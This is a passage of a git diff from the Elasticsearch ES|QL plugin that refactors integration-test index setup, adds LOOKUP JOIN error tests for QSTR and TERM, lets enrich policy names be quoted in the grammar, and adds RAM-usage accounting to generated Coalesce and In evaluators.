a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/QueryStringIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/QueryStringIT.java index aba0a5f4a5b97..d241580545c31 100644 --- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/QueryStringIT.java +++ 
b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/QueryStringIT.java @@ -16,15 +16,17 @@ import org.junit.Before; import java.util.List; +import java.util.function.Consumer; import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertAcked; +import static org.elasticsearch.xpack.esql.plugin.MatchFunctionIT.createAndPopulateLookupIndex; import static org.hamcrest.CoreMatchers.containsString; public class QueryStringIT extends AbstractEsqlIntegTestCase { @Before public void setupIndex() { - createAndPopulateIndex(); + createAndPopulateIndex(this::ensureYellow); } public void testSimpleQueryString() { @@ -91,7 +93,7 @@ public void testInvalidQueryStringLexicalError() { ); } - private void createAndPopulateIndex() { + static void createAndPopulateIndex(Consumer ensureYellow) { var indexName = "test"; var client = client().admin().indices(); var CreateRequest = client.prepareCreate(indexName) @@ -135,7 +137,11 @@ private void createAndPopulateIndex() { ) .setRefreshPolicy(WriteRequest.RefreshPolicy.IMMEDIATE) .get(); - ensureYellow(indexName); + + var lookupIndexName = "test_lookup"; + createAndPopulateLookupIndex(client, lookupIndexName); + + ensureYellow.accept(new String[] { indexName, lookupIndexName }); } public void testWhereQstrWithScoring() { @@ -228,4 +234,15 @@ AND abs(id) > 0 assertValuesInAnyOrder(resp.values(), List.of(List.of(5, 1.0), List.of(4, 1.0))); } } + + public void testWhereQstrWithLookupJoin() { + var query = """ + FROM test + | LOOKUP JOIN test_lookup ON id + | WHERE id > 0 AND QSTR("lookup_content: fox") + """; + + var error = expectThrows(VerificationException.class, () -> run(query)); + assertThat(error.getMessage(), containsString("line 3:3: [QSTR] function cannot be used after LOOKUP")); + } } diff --git a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/TermIT.java b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/TermIT.java index 9afefca5eed6e..a56dec2ff4883 100644 --- a/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/TermIT.java +++ b/x-pack/plugin/esql/src/internalClusterTest/java/org/elasticsearch/xpack/esql/plugin/TermIT.java @@ -7,9 +7,6 @@ package org.elasticsearch.xpack.esql.plugin; -import org.elasticsearch.action.index.IndexRequest; -import org.elasticsearch.action.support.WriteRequest; -import org.elasticsearch.common.settings.Settings; import org.elasticsearch.xpack.esql.VerificationException; import org.elasticsearch.xpack.esql.action.AbstractEsqlIntegTestCase; import org.elasticsearch.xpack.esql.action.EsqlCapabilities; @@ -19,14 +16,14 @@ import java.util.List; -import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertAcked; +import static org.elasticsearch.xpack.esql.plugin.QueryStringIT.createAndPopulateIndex; import static org.hamcrest.CoreMatchers.containsString; public class TermIT extends AbstractEsqlIntegTestCase { @Before public void setupIndex() { - createAndPopulateIndex(); + createAndPopulateIndex(this::ensureYellow); } @Override @@ -90,50 +87,20 @@ public void testNotWhereTerm() { } } - private void createAndPopulateIndex() { - var indexName = "test"; - var client = client().admin().indices(); - var CreateRequest = client.prepareCreate(indexName) - .setSettings(Settings.builder().put("index.number_of_shards", 1)) - .setMapping("id", "type=integer", "content", "type=text"); - assertAcked(CreateRequest); - client().prepareBulk() - .add( - new 
IndexRequest(indexName).id("1") - .source("id", 1, "content", "The quick brown animal swiftly jumps over a lazy dog", "title", "A Swift Fox's Journey") - ) - .add( - new IndexRequest(indexName).id("2") - .source("id", 2, "content", "A speedy brown fox hops effortlessly over a sluggish canine", "title", "The Fox's Leap") - ) - .add( - new IndexRequest(indexName).id("3") - .source("id", 3, "content", "Quick and nimble, the fox vaults over the lazy dog", "title", "Brown Fox in Action") - ) - .add( - new IndexRequest(indexName).id("4") - .source( - "id", - 4, - "content", - "A fox that is quick and brown jumps over a dog that is quite lazy", - "title", - "Speedy Animals" - ) - ) - .add( - new IndexRequest(indexName).id("5") - .source( - "id", - 5, - "content", - "With agility, a quick brown fox bounds over a slow-moving dog", - "title", - "Foxes and Canines" - ) + public void testTermWithLookupJoin() { + var query = """ + FROM test + | LOOKUP JOIN test_lookup ON id + | WHERE id > 0 AND TERM(lookup_content, "fox") + """; + + var error = expectThrows(VerificationException.class, () -> run(query)); + assertThat( + error.getMessage(), + containsString( + "line 3:25: [Term] function cannot operate on [lookup_content], supplied by an index [test_lookup] " + + "in non-STANDARD mode [lookup]" ) - .setRefreshPolicy(WriteRequest.RefreshPolicy.IMMEDIATE) - .get(); - ensureYellow(indexName); + ); } } diff --git a/x-pack/plugin/esql/src/main/antlr/EsqlBaseParser.g4 b/x-pack/plugin/esql/src/main/antlr/EsqlBaseParser.g4 index c03e336eeb11f..86044901c716f 100644 --- a/x-pack/plugin/esql/src/main/antlr/EsqlBaseParser.g4 +++ b/x-pack/plugin/esql/src/main/antlr/EsqlBaseParser.g4 @@ -251,7 +251,12 @@ showCommand ; enrichCommand - : ENRICH policyName=ENRICH_POLICY_NAME (ON matchField=qualifiedNamePattern)? (WITH enrichWithClause (COMMA enrichWithClause)*)? + : ENRICH policyName=enrichPolicyName (ON matchField=qualifiedNamePattern)? (WITH enrichWithClause (COMMA enrichWithClause)*)? 
+    ;
+
+enrichPolicyName
+    : ENRICH_POLICY_NAME
+    | QUOTED_STRING
     ;
 
 enrichWithClause
diff --git a/x-pack/plugin/esql/src/main/antlr/lexer/Enrich.g4 b/x-pack/plugin/esql/src/main/antlr/lexer/Enrich.g4
index 415355260da35..6e933998dc34c 100644
--- a/x-pack/plugin/esql/src/main/antlr/lexer/Enrich.g4
+++ b/x-pack/plugin/esql/src/main/antlr/lexer/Enrich.g4
@@ -24,7 +24,7 @@ ENRICH_WITH : WITH -> type(WITH), pushMode(ENRICH_FIELD_MODE);
 // similar to that of an index
 // see https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-create-index.html#indices-create-api-path-params
 fragment ENRICH_POLICY_NAME_BODY
-    : ~[\\/?"<>| ,#\t\r\n:]
+    : ~[\\/?"<>| ,#\t\r\n:()]
     ;
 
 ENRICH_POLICY_NAME
@@ -36,6 +36,8 @@ ENRICH_MODE_UNQUOTED_VALUE
     : ENRICH_POLICY_NAME -> type(ENRICH_POLICY_NAME)
     ;
 
+ENRICH_QUOTED_POLICY_NAME : QUOTED_STRING -> type(QUOTED_STRING);
+
 ENRICH_LINE_COMMENT
     : LINE_COMMENT -> channel(HIDDEN)
     ;
diff --git a/x-pack/plugin/esql/src/main/antlr/lexer/From.g4 b/x-pack/plugin/esql/src/main/antlr/lexer/From.g4
index 8ea8306b58be6..866c0934984e4 100644
--- a/x-pack/plugin/esql/src/main/antlr/lexer/From.g4
+++ b/x-pack/plugin/esql/src/main/antlr/lexer/From.g4
@@ -29,7 +29,7 @@ FROM_RP : RP -> type(RP), popMode;
 // in 8.14 ` were not allowed
 // this has been relaxed in 8.15 since " is used for quoting
 fragment UNQUOTED_SOURCE_PART
-    : ~[:"=|,[\]/ \t\r\n]
+    : ~[:"=|,[\]/() \t\r\n]
    | '/' ~[*/] // allow single / but not followed by another / or * which would start a comment -- used in index pattern date spec
     ;
diff --git a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceBooleanEvaluator.java
index 15f976d6e4090..48c617bc06ec4 100644
--- a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceBooleanEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceBooleanEvaluator.java
@@ -8,6 +8,7 @@
 package org.elasticsearch.xpack.esql.expression.function.scalar.nulls;
 
 // begin generated imports
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BooleanBlock;
 import org.elasticsearch.compute.data.Page;
@@ -25,12 +26,14 @@
 
 /**
  * {@link EvalOperator.ExpressionEvaluator} implementation for {@link Coalesce}.
- * This class is generated. Edit {@code X-InEvaluator.java.st} instead.
+ * This class is generated. Edit {@code X-CoalesceEvaluator.java.st} instead.
  */
 abstract sealed class CoalesceBooleanEvaluator implements EvalOperator.ExpressionEvaluator permits
     CoalesceBooleanEvaluator.CoalesceBooleanEagerEvaluator, //
     CoalesceBooleanEvaluator.CoalesceBooleanLazyEvaluator {
 
+    private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CoalesceBooleanEvaluator.class);
+
     static ExpressionEvaluator.Factory toEvaluator(EvaluatorMapper.ToEvaluator toEvaluator, List<Expression> children) {
         List<ExpressionEvaluator.Factory> childEvaluators = children.stream().map(toEvaluator::apply).toList();
         if (childEvaluators.stream().allMatch(ExpressionEvaluator.Factory::eagerEvalSafeInLazy)) {
@@ -130,6 +133,15 @@ public final String toString() {
         return getClass().getSimpleName() + "[values=" + evaluators + ']';
     }
 
+    @Override
+    public long baseRamBytesUsed() {
+        long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+        for (ExpressionEvaluator e : evaluators) {
+            baseRamBytesUsed += e.baseRamBytesUsed();
+        }
+        return baseRamBytesUsed;
+    }
+
     @Override
     public final void close() {
         Releasables.closeExpectNoException(() -> Releasables.close(evaluators));
diff --git a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceBytesRefEvaluator.java b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceBytesRefEvaluator.java
index 547c325ccf132..f05202d4e5b39 100644
--- a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceBytesRefEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceBytesRefEvaluator.java
@@ -9,6 +9,7 @@
 // begin generated imports
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BytesRefBlock;
 import org.elasticsearch.compute.data.Page;
@@ -26,12 +27,14 @@
 
 /**
  * {@link EvalOperator.ExpressionEvaluator} implementation for {@link Coalesce}.
- * This class is generated. Edit {@code X-InEvaluator.java.st} instead.
+ * This class is generated. Edit {@code X-CoalesceEvaluator.java.st} instead.
  */
 abstract sealed class CoalesceBytesRefEvaluator implements EvalOperator.ExpressionEvaluator permits
     CoalesceBytesRefEvaluator.CoalesceBytesRefEagerEvaluator, //
     CoalesceBytesRefEvaluator.CoalesceBytesRefLazyEvaluator {
 
+    private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CoalesceBytesRefEvaluator.class);
+
     static ExpressionEvaluator.Factory toEvaluator(EvaluatorMapper.ToEvaluator toEvaluator, List<Expression> children) {
         List<ExpressionEvaluator.Factory> childEvaluators = children.stream().map(toEvaluator::apply).toList();
         if (childEvaluators.stream().allMatch(ExpressionEvaluator.Factory::eagerEvalSafeInLazy)) {
@@ -131,6 +134,15 @@ public final String toString() {
         return getClass().getSimpleName() + "[values=" + evaluators + ']';
     }
 
+    @Override
+    public long baseRamBytesUsed() {
+        long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+        for (ExpressionEvaluator e : evaluators) {
+            baseRamBytesUsed += e.baseRamBytesUsed();
+        }
+        return baseRamBytesUsed;
+    }
+
     @Override
     public final void close() {
         Releasables.closeExpectNoException(() -> Releasables.close(evaluators));
diff --git a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceDoubleEvaluator.java
index a6c36ea2aac4a..ce910ed766bdc 100644
--- a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceDoubleEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceDoubleEvaluator.java
@@ -8,6 +8,7 @@
 package org.elasticsearch.xpack.esql.expression.function.scalar.nulls;
 
 // begin generated imports
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.Page;
@@ -25,12 +26,14 @@
 
 /**
  * {@link EvalOperator.ExpressionEvaluator} implementation for {@link Coalesce}.
- * This class is generated. Edit {@code X-InEvaluator.java.st} instead.
+ * This class is generated. Edit {@code X-CoalesceEvaluator.java.st} instead.
  */
 abstract sealed class CoalesceDoubleEvaluator implements EvalOperator.ExpressionEvaluator permits
     CoalesceDoubleEvaluator.CoalesceDoubleEagerEvaluator, //
     CoalesceDoubleEvaluator.CoalesceDoubleLazyEvaluator {
 
+    private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CoalesceDoubleEvaluator.class);
+
     static ExpressionEvaluator.Factory toEvaluator(EvaluatorMapper.ToEvaluator toEvaluator, List<Expression> children) {
         List<ExpressionEvaluator.Factory> childEvaluators = children.stream().map(toEvaluator::apply).toList();
         if (childEvaluators.stream().allMatch(ExpressionEvaluator.Factory::eagerEvalSafeInLazy)) {
@@ -130,6 +133,15 @@ public final String toString() {
         return getClass().getSimpleName() + "[values=" + evaluators + ']';
     }
 
+    @Override
+    public long baseRamBytesUsed() {
+        long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+        for (ExpressionEvaluator e : evaluators) {
+            baseRamBytesUsed += e.baseRamBytesUsed();
+        }
+        return baseRamBytesUsed;
+    }
+
     @Override
     public final void close() {
         Releasables.closeExpectNoException(() -> Releasables.close(evaluators));
diff --git a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceIntEvaluator.java b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceIntEvaluator.java
index b4be642f34f84..db5b1dde2b431 100644
--- a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceIntEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceIntEvaluator.java
@@ -8,6 +8,7 @@
 package org.elasticsearch.xpack.esql.expression.function.scalar.nulls;
 
 // begin generated imports
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.IntBlock;
 import org.elasticsearch.compute.data.Page;
@@ -25,12 +26,14 @@
 
 /**
  * {@link EvalOperator.ExpressionEvaluator} implementation for {@link Coalesce}.
- * This class is generated. Edit {@code X-InEvaluator.java.st} instead.
+ * This class is generated. Edit {@code X-CoalesceEvaluator.java.st} instead.
  */
 abstract sealed class CoalesceIntEvaluator implements EvalOperator.ExpressionEvaluator permits
     CoalesceIntEvaluator.CoalesceIntEagerEvaluator, //
     CoalesceIntEvaluator.CoalesceIntLazyEvaluator {
 
+    private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CoalesceIntEvaluator.class);
+
     static ExpressionEvaluator.Factory toEvaluator(EvaluatorMapper.ToEvaluator toEvaluator, List<Expression> children) {
         List<ExpressionEvaluator.Factory> childEvaluators = children.stream().map(toEvaluator::apply).toList();
         if (childEvaluators.stream().allMatch(ExpressionEvaluator.Factory::eagerEvalSafeInLazy)) {
@@ -130,6 +133,15 @@ public final String toString() {
         return getClass().getSimpleName() + "[values=" + evaluators + ']';
     }
 
+    @Override
+    public long baseRamBytesUsed() {
+        long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+        for (ExpressionEvaluator e : evaluators) {
+            baseRamBytesUsed += e.baseRamBytesUsed();
+        }
+        return baseRamBytesUsed;
+    }
+
     @Override
     public final void close() {
         Releasables.closeExpectNoException(() -> Releasables.close(evaluators));
diff --git a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceLongEvaluator.java b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceLongEvaluator.java
index 98a782abd1ed1..0b5f2b7d73b85 100644
--- a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceLongEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceLongEvaluator.java
@@ -8,6 +8,7 @@
 package org.elasticsearch.xpack.esql.expression.function.scalar.nulls;
 
 // begin generated imports
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.Page;
@@ -25,12 +26,14 @@
 
 /**
  * {@link EvalOperator.ExpressionEvaluator} implementation for {@link Coalesce}.
- * This class is generated. Edit {@code X-InEvaluator.java.st} instead.
+ * This class is generated. Edit {@code X-CoalesceEvaluator.java.st} instead.
  */
 abstract sealed class CoalesceLongEvaluator implements EvalOperator.ExpressionEvaluator permits
     CoalesceLongEvaluator.CoalesceLongEagerEvaluator, //
     CoalesceLongEvaluator.CoalesceLongLazyEvaluator {
 
+    private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(CoalesceLongEvaluator.class);
+
     static ExpressionEvaluator.Factory toEvaluator(EvaluatorMapper.ToEvaluator toEvaluator, List<Expression> children) {
         List<ExpressionEvaluator.Factory> childEvaluators = children.stream().map(toEvaluator::apply).toList();
         if (childEvaluators.stream().allMatch(ExpressionEvaluator.Factory::eagerEvalSafeInLazy)) {
@@ -130,6 +133,15 @@ public final String toString() {
         return getClass().getSimpleName() + "[values=" + evaluators + ']';
     }
 
+    @Override
+    public long baseRamBytesUsed() {
+        long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+        for (ExpressionEvaluator e : evaluators) {
+            baseRamBytesUsed += e.baseRamBytesUsed();
+        }
+        return baseRamBytesUsed;
+    }
+
     @Override
     public final void close() {
         Releasables.closeExpectNoException(() -> Releasables.close(evaluators));
diff --git a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InBooleanEvaluator.java b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InBooleanEvaluator.java
index 5db804c9a4852..c299987726c91 100644
--- a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InBooleanEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InBooleanEvaluator.java
@@ -9,6 +9,7 @@
 // begin generated imports
 import org.apache.lucene.util.BytesRef;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.BooleanBlock;
 import org.elasticsearch.compute.data.BooleanBlock;
@@ -31,6 +32,8 @@
 * This class is generated. Edit {@code X-InEvaluator.java.st} instead.
*/ public class InBooleanEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(InBooleanEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -169,6 +172,16 @@ public String toString() { return "InBooleanEvaluator[" + "lhs=" + lhs + ", rhs=" + Arrays.toString(rhs) + "]"; } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + for (EvalOperator.ExpressionEvaluator r : rhs) { + baseRamBytesUsed += r.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + @Override public void close() { Releasables.closeExpectNoException(lhs, () -> Releasables.close(rhs)); diff --git a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InBytesRefEvaluator.java b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InBytesRefEvaluator.java index 7113f004c17c9..ce5355796d6a7 100644 --- a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InBytesRefEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InBytesRefEvaluator.java @@ -9,6 +9,7 @@ // begin generated imports import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BytesRefBlock; @@ -31,6 +32,8 @@ * This class is generated. Edit {@code X-InEvaluator.java.st} instead. */ public class InBytesRefEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(InBytesRefEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -159,6 +162,16 @@ public String toString() { return "InBytesRefEvaluator[" + "lhs=" + lhs + ", rhs=" + Arrays.toString(rhs) + "]"; } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + for (EvalOperator.ExpressionEvaluator r : rhs) { + baseRamBytesUsed += r.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + @Override public void close() { Releasables.closeExpectNoException(lhs, () -> Releasables.close(rhs)); diff --git a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InDoubleEvaluator.java b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InDoubleEvaluator.java index 99ffa891b9c7c..d4bac139fd83b 100644 --- a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InDoubleEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InDoubleEvaluator.java @@ -9,6 +9,7 @@ // begin generated imports import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.DoubleBlock; @@ -31,6 +32,8 @@ * This class is generated. Edit {@code X-InEvaluator.java.st} instead. 
*/ public class InDoubleEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(InDoubleEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -149,6 +152,16 @@ public String toString() { return "InDoubleEvaluator[" + "lhs=" + lhs + ", rhs=" + Arrays.toString(rhs) + "]"; } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + for (EvalOperator.ExpressionEvaluator r : rhs) { + baseRamBytesUsed += r.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + @Override public void close() { Releasables.closeExpectNoException(lhs, () -> Releasables.close(rhs)); diff --git a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InIntEvaluator.java b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InIntEvaluator.java index d6c160c0e45d3..758c08be51788 100644 --- a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InIntEvaluator.java @@ -9,6 +9,7 @@ // begin generated imports import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.IntBlock; @@ -31,6 +32,8 @@ * This class is generated. Edit {@code X-InEvaluator.java.st} instead. */ public class InIntEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(InIntEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -149,6 +152,16 @@ public String toString() { return "InIntEvaluator[" + "lhs=" + lhs + ", rhs=" + Arrays.toString(rhs) + "]"; } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + for (EvalOperator.ExpressionEvaluator r : rhs) { + baseRamBytesUsed += r.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + @Override public void close() { Releasables.closeExpectNoException(lhs, () -> Releasables.close(rhs)); diff --git a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InLongEvaluator.java b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InLongEvaluator.java index 9f9b05b4c9c54..84709bea1c97f 100644 --- a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InLongEvaluator.java @@ -9,6 +9,7 @@ // begin generated imports import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.LongBlock; @@ -31,6 +32,8 @@ * This class is generated. Edit {@code X-InEvaluator.java.st} instead. 
*/ public class InLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(InLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -149,6 +152,16 @@ public String toString() { return "InLongEvaluator[" + "lhs=" + lhs + ", rhs=" + Arrays.toString(rhs) + "]"; } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + for (EvalOperator.ExpressionEvaluator r : rhs) { + baseRamBytesUsed += r.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + @Override public void close() { Releasables.closeExpectNoException(lhs, () -> Releasables.close(rhs)); diff --git a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InMillisNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InMillisNanosEvaluator.java index d95aa2f52550e..2256f63c81e1a 100644 --- a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InMillisNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InMillisNanosEvaluator.java @@ -9,6 +9,7 @@ // begin generated imports import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.LongBlock; @@ -31,6 +32,8 @@ * This class is generated. Edit {@code X-InEvaluator.java.st} instead. */ public class InMillisNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(InMillisNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -149,6 +152,16 @@ public String toString() { return "InMillisNanosEvaluator[" + "lhs=" + lhs + ", rhs=" + Arrays.toString(rhs) + "]"; } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + for (EvalOperator.ExpressionEvaluator r : rhs) { + baseRamBytesUsed += r.baseRamBytesUsed(); + } + return baseRamBytesUsed; + } + @Override public void close() { Releasables.closeExpectNoException(lhs, () -> Releasables.close(rhs)); diff --git a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InNanosMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InNanosMillisEvaluator.java index 6461acde51187..97d358afb1a14 100644 --- a/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InNanosMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated-src/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InNanosMillisEvaluator.java @@ -9,6 +9,7 @@ // begin generated imports import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.LongBlock; @@ -31,6 +32,8 @@ * 